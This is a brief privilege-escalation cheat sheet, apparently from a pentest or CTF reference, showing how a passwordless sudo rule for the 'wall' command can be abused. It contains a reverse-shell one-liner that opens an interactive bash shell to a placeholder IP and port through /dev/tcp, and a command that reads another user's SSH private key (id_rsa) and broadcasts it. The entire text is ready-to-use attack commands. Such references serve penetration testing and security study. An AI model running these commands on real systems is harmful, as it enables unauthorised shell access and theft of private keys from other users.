sudo -l

(ALL) NOPASSWD: wall

# Reverse shell
sudo wall "$(bash -c 'bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1')"

# Gets a SSH private key of another user
sudo wall "$(cat /home/user/.ssh/id_rsa)"